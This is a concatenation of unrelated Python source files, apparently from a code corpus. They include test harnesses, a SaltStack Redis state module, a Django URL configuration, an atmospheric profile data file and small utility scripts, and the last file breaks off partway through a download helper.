            self.ctl.out("TESTS PASSED: %s" % state.passed)
        if state.failed:
            self.ctl.out("TESTS FAILED: %s" % state.failed)
        if state.updated:
            self.ctl.out("TESTS UPDATED: %s" % state.updated)
        self.ctl.out()
        # Produce a fatal error if at least one test failed.
        if state.failed:
            if state.failed == 1:
                message = "a test failed"
            else:
                message = "%s tests failed" % state.failed
            raise ScriptError(message)
    def load_input(self, path):
        """Load test input data from `path`, or from stdin when `path` is None."""
        assert isinstance(path, maybe(str))
        if path is not None:
            stream = open(path, 'rb')
        else:
            stream = self.ctl.stdin
        loader = RegressYAMLLoader(self, True, False, stream)
        # BUG FIX: the stream was never closed; close it in `finally`,
        # but only when we opened it ourselves (leave stdin alone).
        try:
            try:
                input = loader.load()
            except yaml.YAMLError as exc:
                raise ScriptError("failed to load test input data: %s" % exc)
        finally:
            if path is not None:
                stream.close()
        return input
    def load_output(self, path):
        """Load expected test output data from a file."""
        assert isinstance(path, str)
        # BUG FIX: use a context manager so the file handle is released
        # even when parsing fails (it was previously leaked).
        with open(path, 'rb') as stream:
            loader = RegressYAMLLoader(self, False, True, stream)
            try:
                input = loader.load()
            except yaml.YAMLError as exc:
                raise ScriptError("failed to load test output data: %s" % exc)
        return input
    def save_output(self, path, output):
        """Serialize and write test output data to a file."""
        assert isinstance(path, str)
        assert isinstance(output, TestData)
        # BUG FIX: use a context manager so the output file is flushed and
        # closed even when dumping fails (it was previously leaked).
        with open(path, 'wb') as stream:
            if self.output_help is not None:
                self.ctl.out(trim_doc(self.output_help), file=stream)
                self.ctl.out(file=stream)
            dumper = RegressYAMLDumper(self, False, True, stream)
            try:
                dumper.dump(output)
            except yaml.YAMLError as exc:
                raise ScriptError("failed to write test output data: %s" % exc)
|
python
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import gym
import shutil
import tempfile
import ray
from ray.rllib.a3c import DEFAULT_CONFIG
from ray.rllib.a3c.a3c_evaluator import A3CEvaluator
from ray.rllib.dqn.dqn_evaluator import adjust_nstep
from ray.tune.registry import get_registry
class DQNEvaluatorTest(unittest.TestCase):
    def testNStep(self):
        """adjust_nstep rewrites the trajectory arrays in place for n=3."""
        obs = [1, 2, 3, 4, 5, 6, 7]
        actions = ["a", "b", "a", "a", "a", "b", "a"]
        rewards = [10.0, 0.0, 100.0, 100.0, 100.0, 100.0, 100000.0]
        new_obs = [2, 3, 4, 5, 6, 7, 8]
        dones = [1, 0, 0, 0, 0, 1, 0]
        adjust_nstep(3, 0.9, obs, actions, rewards, new_obs, dones)
        # Each (actual, expected) pair checks one of the mutated arrays.
        checks = [
            (obs, [1, 2, 3, 4, 5]),
            (actions, ["a", "b", "a", "a", "a"]),
            (rewards, [10.0, 171.0, 271.0, 271.0, 190.0]),
            (new_obs, [2, 5, 6, 7, 7]),
            (dones, [1, 0, 0, 0, 0]),
        ]
        for actual, expected in checks:
            self.assertEqual(actual, expected)
class A3CEvaluatorTest(unittest.TestCase):
    """Tests for A3CEvaluator filter bookkeeping (get/sync/flush)."""
    def setUp(self):
        # Single-CPU Ray cluster; the evaluator logs into a temporary
        # directory that tearDown removes.
        ray.init(num_cpus=1)
        config = DEFAULT_CONFIG.copy()
        config["num_workers"] = 1
        config["observation_filter"] = "ConcurrentMeanStdFilter"
        config["reward_filter"] = "MeanStdFilter"
        config["batch_size"] = 2
        self._temp_dir = tempfile.mkdtemp("a3c_evaluator_test")
        self.e = A3CEvaluator(
            get_registry(),
            lambda config: gym.make("CartPole-v0"),
            config,
            logdir=self._temp_dir)
    def tearDown(self):
        # Shut down Ray and clean up the log directory.
        ray.worker.cleanup()
        shutil.rmtree(self._temp_dir)
    def sample_and_flush(self):
        """Draw one sample batch and return the flushed (obs, rew) filters."""
        e = self.e
        self.e.sample()
        filters = e.get_filters(flush_after=True)
        obs_f = filters["obs_filter"]
        rew_f = filters["rew_filter"]
        # Sampling must have pushed data through both filters.
        self.assertNotEqual(obs_f.rs.n, 0)
        self.assertNotEqual(obs_f.buffer.n, 0)
        self.assertNotEqual(rew_f.rs.n, 0)
        self.assertNotEqual(rew_f.buffer.n, 0)
        return obs_f, rew_f
    def testGetFilters(self):
        # After a flush, the running-stat count may only grow, and the
        # buffer holds at most the samples accumulated since the flush.
        e = self.e
        obs_f, rew_f = self.sample_and_flush()
        COUNT = obs_f.rs.n
        filters = e.get_filters(flush_after=False)
        obs_f = filters["obs_filter"]
        NEW_COUNT = obs_f.rs.n
        self.assertGreaterEqual(NEW_COUNT, COUNT)
        self.assertLessEqual(obs_f.buffer.n, NEW_COUNT - COUNT)
    def testSyncFilter(self):
        """Show that sync_filters rebases own buffer over input"""
        e = self.e
        obs_f, _ = self.sample_and_flush()
        # Current State
        filters = e.get_filters(flush_after=False)
        obs_f = filters["obs_filter"]
        rew_f = filters["rew_filter"]
        self.assertLessEqual(obs_f.buffer.n, 20)
        # Pretend the synced-in filter has already seen 100 samples;
        # after sync the local stats must reflect at least that count.
        new_obsf = obs_f.copy()
        new_obsf.rs._n = 100
        e.sync_filters({"obs_filter": new_obsf, "rew_filter": rew_f})
        filters = e.get_filters(flush_after=False)
        obs_f = filters["obs_filter"]
        self.assertGreaterEqual(obs_f.rs.n, 100)
        self.assertLessEqual(obs_f.buffer.n, 20)
# Run the test suite when this module is executed as a script.
if __name__ == '__main__':
    unittest.main(verbosity=2)
|
python
|
# -*- coding: utf-8 -*-
"""
Management of Redis server
==========================
.. versionadded:: 2014.7.0
:depends: - redis Python module
:configuration: See :py:mod:`salt.modules.redis` for setup instructions.
.. code-block:: yaml
key_in_redis:
redis.string:
- value: string data
The redis server information specified in the minion config file can be
overridden in states using the following arguments: ``host``, ``port``, ``db``,
``password``.
.. code-block:: yaml
key_in_redis:
redis.string:
- value: string data
- host: localhost
- port: 6379
- db: 0
- password: somuchkittycat
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
__virtualname__ = "redis"
def __virtual__():
    """
    Only load if the redis module is in __salt__
    """
    # Guard clause: without the redis execution module these states
    # cannot operate.
    if "redis.set_key" not in __salt__:
        return (False, "redis module could not be loaded")
    return __virtualname__
def string(name, value, expire=None, expireat=None, **connection_args):
    """
    Ensure that the key exists in redis with the value specified

    name
        Redis key to manage
    value
        Data to persist in key
    expire
        Sets time to live for key in seconds
    expireat
        Sets expiration time for key via UNIX timestamp, overrides `expire`
    """
    ret = {
        "name": name,
        "result": True,
        "changes": {},
        "comment": "Key already set to defined value",
    }
    existing = __salt__["redis.get_key"](name, **connection_args)
    # Only touch the key when the stored value actually differs.
    if existing != value:
        __salt__["redis.set_key"](name, value, **connection_args)
        ret["changes"][name] = "Value updated"
        ret["comment"] = "Key updated to new value"
    # An absolute expiration timestamp takes precedence over a TTL.
    if expireat:
        __salt__["redis.expireat"](name, expireat, **connection_args)
        ret["changes"]["expireat"] = "Key expires at {0}".format(expireat)
    elif expire:
        __salt__["redis.expire"](name, expire, **connection_args)
        ret["changes"]["expire"] = "TTL set to {0} seconds".format(expire)
    return ret
def absent(name, keys=None, **connection_args):
    """
    Ensure key absent from redis

    name
        Key to ensure absent from redis
    keys
        list of keys to ensure absent, name will be ignored if this is used
    """
    ret = {
        "name": name,
        "result": True,
        "changes": {},
        "comment": "Key(s) specified already absent",
    }
    # Single-key path: used whenever `keys` is empty or not supplied.
    if not keys:
        if __salt__["redis.exists"](name, **connection_args):
            __salt__["redis.delete"](name, **connection_args)
            ret["comment"] = "Key deleted"
            ret["changes"]["deleted"] = [name]
        return ret
    # Multi-key path: `keys` must be a proper list.
    if not isinstance(keys, list):
        ret["result"] = False
        ret["comment"] = "`keys` not formed as a list type"
        return ret
    delete_list = [
        key for key in keys if __salt__["redis.exists"](key, **connection_args)
    ]
    if not delete_list:
        return ret
    __salt__["redis.delete"](*delete_list, **connection_args)
    ret["changes"]["deleted"] = delete_list
    ret["comment"] = "Keys deleted"
    return ret
def slaveof(
    name,
    sentinel_host=None,
    sentinel_port=None,
    sentinel_password=None,
    **connection_args
):
    """
    Set this redis instance as a slave.

    .. versionadded: 2016.3.0

    name
        Master to make this a slave of
    sentinel_host
        Ip of the sentinel to check for the master
    sentinel_port
        Port of the sentinel to check for the master
    sentinel_password
        Password used when querying the sentinel, if it requires one
    """
    # Pessimistic default: overwritten only when every step succeeds.
    ret = {
        "name": name,
        "changes": {},
        "result": False,
        "comment": "Failed to setup slave",
    }
    kwargs = copy.copy(connection_args)
    # Ask the sentinel which host currently holds the master role.
    sentinel_master = __salt__["redis.sentinel_get_master_ip"](
        name, sentinel_host, sentinel_port, sentinel_password
    )
    # If this minion owns the master IP, there is nothing to enslave.
    if sentinel_master["master_host"] in __salt__["network.ip_addrs"]():
        ret["result"] = True
        ret["comment"] = "Minion is the master: {0}".format(name)
        return ret
    first_master = __salt__["redis.get_master_ip"](**connection_args)
    # Already replicating from the desired master: nothing to change.
    if first_master == sentinel_master:
        ret["result"] = True
        ret["comment"] = "Minion already slave of master: {0}".format(name)
        return ret
    # Test mode: report the pending change without applying it.
    if __opts__["test"] is True:
        ret["comment"] = "Minion will be made a slave of {0}: {1}".format(
            name, sentinel_master["host"]
        )
        ret["result"] = None
        return ret
    # Apply the change and verify that the master actually switched.
    kwargs.update(**sentinel_master)
    __salt__["redis.slaveof"](**kwargs)
    current_master = __salt__["redis.get_master_ip"](**connection_args)
    if current_master != sentinel_master:
        return ret
    ret["result"] = True
    ret["changes"] = {
        "old": first_master,
        "new": current_master,
    }
    ret["comment"] = "Minion successfully connected to master: {0}".format(name)
    return ret
|
python
|
import cv2
import numpy as np
import matplotlib.pyplot as plt

# Load the image and collapse it to single-channel grayscale intensities.
img = cv2.imread('canyon.png')
gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

# Count pixels per intensity level in one vectorized O(N) pass instead of
# scanning the whole image once per level (256 full-image scans before).
# minlength=256 guarantees a bin for every possible 8-bit intensity.
values = np.bincount(gray_img.ravel(), minlength=256)

# Render the histogram and save it to disk.
plt.bar(range(256), height=values, width=1.)
plt.xlabel('intensity')
plt.ylabel('pixels')
plt.savefig('chart.png')
|
python
|
"""
Profile ../profile-datasets-py/div83/023.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div83/023.py"
self["Q"] = numpy.array([ 2.79844200e+00, 3.21561000e+00, 4.08284300e+00,
4.76402700e+00, 4.58551900e+00, 4.69499800e+00,
5.22973300e+00, 5.84156600e+00, 6.18858200e+00,
6.21784100e+00, 6.21911100e+00, 6.16721200e+00,
6.00577400e+00, 5.67508800e+00, 5.23121300e+00,
4.81113700e+00, 4.55030900e+00, 4.39987100e+00,
4.29931200e+00, 4.22282200e+00, 4.15552300e+00,
4.09809300e+00, 4.04698400e+00, 4.00343400e+00,
3.96829400e+00, 3.94125400e+00, 3.91683500e+00,
3.89245500e+00, 3.87021500e+00, 3.85012500e+00,
3.83217500e+00, 3.82010500e+00, 3.81511500e+00,
3.81423500e+00, 3.81682500e+00, 3.82262500e+00,
3.83055500e+00, 3.84032500e+00, 3.85492500e+00,
3.87799500e+00, 3.90433500e+00, 3.92437500e+00,
3.94598400e+00, 3.97470400e+00, 4.01590400e+00,
4.04815400e+00, 4.03697400e+00, 4.03236400e+00,
4.03976400e+00, 4.14153300e+00, 4.59046900e+00,
5.41755100e+00, 6.21536100e+00, 7.46027400e+00,
9.47053000e+00, 1.24248500e+01, 1.70469100e+01,
2.38214300e+01, 2.79383200e+01, 3.07220600e+01,
3.31475000e+01, 3.59911000e+01, 3.99466000e+01,
4.64855400e+01, 5.73845100e+01, 7.41050100e+01,
1.02426500e+02, 1.38336900e+02, 1.73875800e+02,
2.01908200e+02, 2.49736600e+02, 3.41031700e+02,
4.82377200e+02, 6.08759200e+02, 6.98893200e+02,
7.49942200e+02, 6.57168800e+02, 5.95259500e+02,
5.49234200e+02, 3.84860800e+02, 2.39486600e+02,
1.34069000e+02, 1.01649700e+02, 1.26293000e+02,
1.82372700e+02, 2.29509300e+02, 3.02564400e+02,
4.86049600e+02, 6.92652900e+02, 1.47797200e+03,
2.63994200e+03, 3.37610300e+03, 3.89369000e+03,
4.35807400e+03, 5.44476200e+03, 6.95739600e+03,
7.05270600e+03, 7.76016900e+03, 7.54917600e+03,
7.34658800e+03, 7.15201000e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56505000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61260000e+01, 6.09895000e+01, 6.61253000e+01,
7.15398000e+01, 7.72396000e+01, 8.32310000e+01,
8.95204000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17778000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23442000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90893000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53628000e+02, 7.77790000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31524000e+02, 9.58591000e+02,
9.86067000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 375.11 , 375.1098, 375.1095, 375.1092, 375.1103, 375.1112,
375.102 , 375.0748, 375.0387, 375.0027, 374.9657, 374.9347,
374.9347, 374.9779, 375.066 , 375.2462, 375.4553, 375.5563,
375.5914, 375.6144, 375.6834, 375.7585, 375.8175, 375.8015,
375.8185, 375.8575, 375.9295, 376.0125, 376.1415, 376.2736,
376.3256, 376.3816, 376.4906, 376.6096, 376.7786, 376.9766,
377.1776, 377.3716, 377.5755, 377.9805, 378.4275, 378.9005,
379.4005, 379.9165, 379.9895, 380.0655, 380.1185, 380.1515,
380.1955, 380.3004, 380.4083, 380.4939, 380.5716, 380.6732,
380.8284, 380.9903, 381.1505, 381.3149, 381.4673, 381.6093,
381.7373, 381.8043, 381.8727, 381.8402, 381.7941, 381.6917,
381.5509, 381.4192, 381.3097, 381.212 , 381.1708, 381.112 ,
381.0581, 381.0109, 380.9795, 380.9641, 380.9895, 380.9991,
380.9846, 381.0113, 381.0177, 381.0059, 380.9633, 380.8999,
380.8305, 380.7756, 380.7188, 380.6409, 380.5542, 380.2432,
379.7768, 379.4616, 379.2207, 379.007 , 378.5665, 377.9679,
377.9128, 377.6306, 377.703 , 377.7771, 377.8511])
self["CO"] = numpy.array([ 0.2633713 , 0.2658481 , 0.2708949 , 0.2798357 , 0.2943857 ,
0.3169055 , 0.3270093 , 0.3025382 , 0.2106017 , 0.1228242 ,
0.07192025, 0.04720251, 0.02749763, 0.0176824 , 0.01330503,
0.01175584, 0.01216294, 0.01235085, 0.01191595, 0.01109635,
0.01048156, 0.01065176, 0.01107116, 0.01118836, 0.01095626,
0.01048936, 0.01037516, 0.01030036, 0.01028216, 0.01026766,
0.01031526, 0.01036646, 0.01061996, 0.01090526, 0.01135316,
0.01191435, 0.01257265, 0.01338555, 0.01430114, 0.01698863,
0.02058872, 0.0247199 , 0.02928728, 0.03486766, 0.03547156,
0.03611435, 0.03603435, 0.03538126, 0.03486586, 0.03537075,
0.03590374, 0.0365283 , 0.03721557, 0.03815132, 0.03968272,
0.04133349, 0.04397005, 0.04697288, 0.04988211, 0.05270888,
0.05543176, 0.05699425, 0.05865026, 0.05972622, 0.06078511,
0.06102698, 0.06077157, 0.0600102 , 0.05846103, 0.05707617,
0.05641971, 0.05576448, 0.05575019, 0.05573665, 0.05577429,
0.05582021, 0.05583748, 0.05584664, 0.05582452, 0.05580362,
0.05573265, 0.05565114, 0.05552915, 0.0553906 , 0.05522743,
0.05502187, 0.05479002, 0.05452069, 0.05428088, 0.05400267,
0.05363653, 0.05297076, 0.05227825, 0.0516777 , 0.0512194 ,
0.0509122 , 0.05080981, 0.05063281, 0.05016561, 0.04969551,
0.04922292])
self["T"] = numpy.array([ 197.556, 205.148, 219.995, 240.314, 257.486, 264.952,
260.228, 247.287, 234.817, 228.724, 228.789, 228.982,
226.537, 222.31 , 217.705, 214.27 , 211.775, 209.309,
207.224, 206.093, 206.618, 207.997, 209.315, 210.38 ,
211.099, 211.505, 211.873, 212.371, 213.051, 213.908,
214.837, 215.571, 216.029, 216.031, 215.881, 215.892,
216.224, 216.699, 216.908, 216.703, 216.372, 216.338,
216.472, 216.439, 216.209, 216.181, 216.454, 216.965,
217.694, 218.094, 218.032, 217.803, 217.179, 215.873,
214.502, 213.833, 213.502, 212.442, 212.136, 212.741,
213.98 , 215.429, 216.953, 218.865, 221.017, 223.335,
225.768, 228.287, 230.855, 233.441, 235.821, 238.02 ,
240.023, 242.129, 244.298, 246.531, 248.765, 250.979,
253.162, 255.179, 257.081, 258.906, 260.675, 262.335,
263.83 , 265.078, 265.993, 266.655, 267.483, 267.492,
267.496, 268.771, 270.518, 272.394, 274.203, 275.936,
278.184, 279.876, 279.876, 279.876, 279.876])
self["N2O"] = numpy.array([ 0.00066 , 0.00066 , 0.00066 , 0.00170999, 0.00157999,
0.00117 , 0.00102 , 0.00093999, 0.00109999, 0.00186999,
0.00278998, 0.00385998, 0.00502997, 0.00794995, 0.01126994,
0.01598992, 0.0223999 , 0.03255986, 0.04303981, 0.05860975,
0.07344969, 0.09338962, 0.1153595 , 0.1364095 , 0.1593194 ,
0.1816793 , 0.2032092 , 0.2216691 , 0.2387291 , 0.255199 ,
0.269519 , 0.2770789 , 0.2843989 , 0.2914989 , 0.2959989 ,
0.2990189 , 0.3018688 , 0.3031288 , 0.3042188 , 0.3052488 ,
0.3062088 , 0.3071688 , 0.3081388 , 0.3091188 , 0.3100888 ,
0.3110487 , 0.3119987 , 0.3129287 , 0.3138187 , 0.3146787 ,
0.3154986 , 0.3162583 , 0.316948 , 0.3175776 , 0.318107 ,
0.318326 , 0.3185246 , 0.3187024 , 0.3188511 , 0.3189802 ,
0.3190694 , 0.3191285 , 0.3191473 , 0.3191452 , 0.3191417 ,
0.3191363 , 0.3191273 , 0.3191158 , 0.3191045 , 0.3190956 ,
0.3190803 , 0.3190512 , 0.319006 , 0.3189657 , 0.3189369 ,
0.3189206 , 0.3189503 , 0.31897 , 0.3189847 , 0.3190372 ,
0.3190836 , 0.3191172 , 0.3191276 , 0.3191197 , 0.3191018 ,
0.3190867 , 0.3190634 , 0.3190049 , 0.3189389 , 0.3186883 ,
0.3183174 , 0.3180825 , 0.3179173 , 0.3177691 , 0.3174222 ,
0.3169395 , 0.3169091 , 0.3166833 , 0.3167506 , 0.3168153 ,
0.3168774 ])
self["O3"] = numpy.array([ 0.1701035 , 0.1775344 , 0.2070442 , 0.3108455 , 0.4857418 ,
0.7174716 , 1.135664 , 1.854109 , 2.782353 , 3.737137 ,
4.530402 , 5.187768 , 5.835555 , 6.478703 , 7.042913 ,
7.406004 , 7.476306 , 7.470997 , 7.415398 , 7.330429 ,
7.24153 , 7.137661 , 6.989612 , 6.787533 , 6.528764 ,
6.220455 , 5.884567 , 5.503819 , 5.09551 , 4.693582 ,
4.327893 , 3.985085 , 3.678286 , 3.335367 , 2.953589 ,
2.57246 , 2.217582 , 1.889313 , 1.586384 , 1.319205 ,
1.117156 , 1.004066 , 0.9006934 , 0.7929348 , 0.6598114 ,
0.5608037 , 0.5221579 , 0.4566192 , 0.3826315 , 0.3151257 ,
0.2497519 , 0.1938919 , 0.161567 , 0.1437669 , 0.1241348 ,
0.09875807, 0.08337688, 0.07254977, 0.06489109, 0.06011635,
0.0572758 , 0.05523301, 0.05391805, 0.05260935, 0.05118826,
0.04970942, 0.04921116, 0.04938217, 0.04948469, 0.04887103,
0.0496528 , 0.05139117, 0.05410789, 0.05309466, 0.05165747,
0.0498389 , 0.04871117, 0.04829424, 0.04853613, 0.04912888,
0.04907085, 0.0484611 , 0.04731189, 0.04690288, 0.04737696,
0.0483425 , 0.04885881, 0.04753838, 0.04404007, 0.0405377 ,
0.03945616, 0.04006498, 0.03954044, 0.03722645, 0.03488482,
0.03295968, 0.02738151, 0.02086214, 0.02086658, 0.02087084,
0.02087493])
self["CH4"] = numpy.array([ 0.00907582, 0.00907582, 0.07173381, 0.1168504 , 0.1393494 ,
0.1532193 , 0.1714531 , 0.1907549 , 0.2226026 , 0.2802003 ,
0.3650427 , 0.4563802 , 0.5494887 , 0.6393934 , 0.7256052 ,
0.8122181 , 0.9008319 , 0.9992386 , 1.092925 , 1.184485 ,
1.271705 , 1.344764 , 1.409534 , 1.471594 , 1.516804 ,
1.558394 , 1.598414 , 1.620794 , 1.637004 , 1.637534 ,
1.638104 , 1.638704 , 1.639354 , 1.635034 , 1.630864 ,
1.626924 , 1.623304 , 1.620094 , 1.624864 , 1.629904 ,
1.635204 , 1.640764 , 1.646614 , 1.680853 , 1.691653 ,
1.702943 , 1.710403 , 1.714873 , 1.719423 , 1.723453 ,
1.727652 , 1.729941 , 1.731429 , 1.732867 , 1.734094 ,
1.735358 , 1.73741 , 1.739609 , 1.741511 , 1.743156 ,
1.744602 , 1.745187 , 1.74578 , 1.745269 , 1.74462 ,
1.743181 , 1.741222 , 1.739449 , 1.738058 , 1.736819 ,
1.736406 , 1.735898 , 1.735642 , 1.735413 , 1.735316 ,
1.735308 , 1.735469 , 1.735556 , 1.735436 , 1.735492 ,
1.735344 , 1.735097 , 1.734644 , 1.734111 , 1.733554 ,
1.733122 , 1.732716 , 1.732248 , 1.73171 , 1.730099 ,
1.727667 , 1.725943 , 1.724649 , 1.723625 , 1.721685 ,
1.719006 , 1.718802 , 1.717547 , 1.717893 , 1.718243 ,
1.71858 ])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 279.876
self["S2M"]["Q"] = 7152.01027939
self["S2M"]["O"] = 0.0208749268383
self["S2M"]["P"] = 1007.99701
self["S2M"]["U"] = 0.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 1
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 279.876
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 0.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = -50.931
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([2007, 6, 10])
self["TIME"] = numpy.array([0, 0, 0])
|
python
|
"""
Outpost URL Configuration
"""
import django
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.views.static import serve
from django.views.i18n import JavaScriptCatalog
from rest_framework.authtoken import views as authtoken
# Translation catalogs exposed through the JavaScript i18n view.
js_info_dict = {
    'packages': ('recurrence', ),
}

urlpatterns = []

if settings.DEBUG:
    import debug_toolbar

    # Serve media/static directly and mount the debug toolbar — DEBUG only.
    urlpatterns.extend(
        [
            url(r"^media/(?P<path>.*)$", serve, {"document_root": settings.MEDIA_ROOT}),
            url(
                r"^static/(?P<path>.*)$", serve, {"document_root": settings.STATIC_ROOT}
            ),
        ]
    )
    urlpatterns.extend([url(r"^__debug__/", include(debug_toolbar.urls))])

urlpatterns.extend(
    [
        url(r"^admin/", admin.site.urls),
        # BUG FIX: `JavaScriptCatalog` reads a URLconf `packages` kwarg as a
        # "+"-delimited *string* (it calls .split('+') on it), so passing the
        # tuple from js_info_dict as extra view kwargs raised AttributeError
        # at request time. Configure the view through as_view() instead,
        # which sets the `packages` class attribute directly.
        url(r'^jsi18n/$', JavaScriptCatalog.as_view(**js_info_dict)),
        url(r"^auth/api/", include("rest_framework.urls", namespace="rest_framework")),
        url(r"^prometheus/", include("django_prometheus.urls")),
        url(r"^auth/token/", authtoken.obtain_auth_token),
        url(
            r"^saml2/",
            include(
                ("djangosaml2.urls", "saml2")
                if django.VERSION >= (2, 1)
                else "djangosaml2.urls",
                namespace="saml2",
            ),
        ),
        url(
            r"^oauth2/",
            include(
                ("outpost.django.oauth2.urls", "oauth2")
                if django.VERSION >= (2, 1)
                else "outpost.django.oauth2.urls",
                namespace="oauth2",
            ),
        ),
        url(r"^lti/", include("outpost.django.lti.urls", namespace="lti")),
        url(
            r"^attendance/",
            include("outpost.django.attendance.urls", namespace="attendance"),
        ),
        url(
            r"^research/",
            include("outpost.django.research.urls", namespace="research"),
        ),
        url(
            r"^campusonline/",
            include("outpost.django.campusonline.urls", namespace="campusonline"),
        ),
        url(
            r"^networktoken/",
            include("outpost.django.networktoken.urls", namespace="networktoken"),
        ),
        url(r"^salt/", include("outpost.django.salt.urls", namespace="salt")),
        url(r"^typo3/", include("outpost.django.typo3.urls", namespace="typo3")),
        url(r"^borg/", include("outpost.django.borg.urls", namespace="borg")),
        url(r"^video/", include("outpost.django.video.urls", namespace="video")),
        url(
            r"^redirect/", include("outpost.django.redirect.urls", namespace="redirect")
        ),
        # Catch-all prefixes must stay last so specific routes match first.
        url(r"^", include("outpost.django.api.urls", namespace="api")),
        url(
            r"^",
            include(("django.contrib.auth.urls", "accounts"), namespace="accounts"),
        ),
        url(r"^", include("outpost.django.base.urls", namespace="base")),
    ]
)
|
python
|
import argparse
from flatdb import flatdb_app
from flatdb.app import define_urls
def get_options(argv=None):
    """Parse command-line options for the flatdb server.

    Parameters
    ----------
    argv : list[str] | None
        Argument vector to parse. ``None`` (the default) keeps the original
        behavior of reading ``sys.argv[1:]``, so existing zero-argument
        call sites are unaffected; passing an explicit list makes the
        function testable without touching the real command line.

    Returns
    -------
    argparse.Namespace
        With attributes ``debug``, ``port``, ``database`` and ``host``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--debug', action='store_true', default=False)
    parser.add_argument('-p', '--port', type=int, default=7532)
    parser.add_argument('-b', '--database')
    parser.add_argument('-H', '--host', default='127.0.0.1')
    return parser.parse_args(argv)
def configure_app(app, options):
    """Store the database path on the app config and register the URL routes."""
    app.config['DB'] = options.database
    define_urls(app)
def dev_server():
    """Run the app under Flask's built-in development server (blocking)."""
    options = get_options()
    configure_app(flatdb_app, options)
    flatdb_app.run(debug=options.debug, port=options.port, host=options.host)
def run_server():
    """Serve the app with gevent's WSGIServer (blocking)."""
    options = get_options()
    configure_app(flatdb_app, options)
    # imported here, presumably so the dev path does not require gevent
    from gevent.pywsgi import WSGIServer
    server = WSGIServer((options.host, options.port), flatdb_app)
    server.serve_forever()
# Script entry point: production-style gevent server (use dev_server() for debugging).
if __name__ == '__main__':
    run_server()
|
python
|
'''
the following import is only necessary because eip is not in this directory
'''
import sys
sys.path.append('..')
'''
The simplest example of reading a tag from a PLC
NOTE: You only need to call .Close() after you are done exchanging
data with the PLC. If you were going to read in a loop or read
more tags, you wouldn't want to call .Close() every time.
'''
from pylogix import PLC
# Connect to the controller at the given address.
comm = PLC()
comm.IPAddress = '192.168.1.9'
# Read a single tag; the response object exposes the tag's value via .value.
ret = comm.Read('CurrentScreen')
print(ret.value)
# Release the connection once we are done talking to the PLC.
comm.Close()
|
python
|
from __future__ import unicode_literals
import frappe
from frappe.model.utils.rename_field import rename_field
def execute():
    """Patch: rename Pricing Rule fields ``price_or_discount`` ->
    ``rate_or_discount`` and ``price`` -> ``rate``, tolerating databases
    where the rename has already happened."""
    frappe.reload_doc("accounts", "doctype", "pricing_rule")
    try:
        rename_field("Pricing Rule", "price_or_discount", "rate_or_discount")
        rename_field("Pricing Rule", "price", "rate")
    except Exception as e:
        # 1054 is MySQL's "Unknown column" error code — presumably the source
        # column is already gone (patch re-run); anything else is re-raised.
        if e.args[0]!=1054:
            raise
|
python
|
import logging
import os
import requests
import pickle
import json
from configparser import ConfigParser
logger = logging.getLogger(__name__)
# Package directory; data folders and config.cfg are resolved relative to it.
project_dir = os.path.abspath(os.path.dirname(__file__)) + '/'
config = ConfigParser()
# NOTE(review): project_dir already ends with '/', so this produces '//' in
# the path — harmless on POSIX but worth normalizing.
config.read(project_dir + '/config.cfg')
def get_or_download_file(filename, k, value, config):
    """Return the local path of *filename*, downloading it on first use.

    The target folder is read from *config* section ``k``, option ``value``,
    resolved relative to the package directory. Missing folders are created;
    missing files are fetched from the ModelSEED data mirror.

    :param filename: remote and local file name
    :param k: config section holding the folder option
    :param value: config option naming the folder
    :param config: ConfigParser instance to read the folder from
    :return: absolute path of the (possibly just downloaded) file
    """
    folder_path = f'{project_dir}/' + config.get(k, value)
    # BUG FIX: the local file must be named after *filename*; previously a
    # literal placeholder string was used here, so every download was written
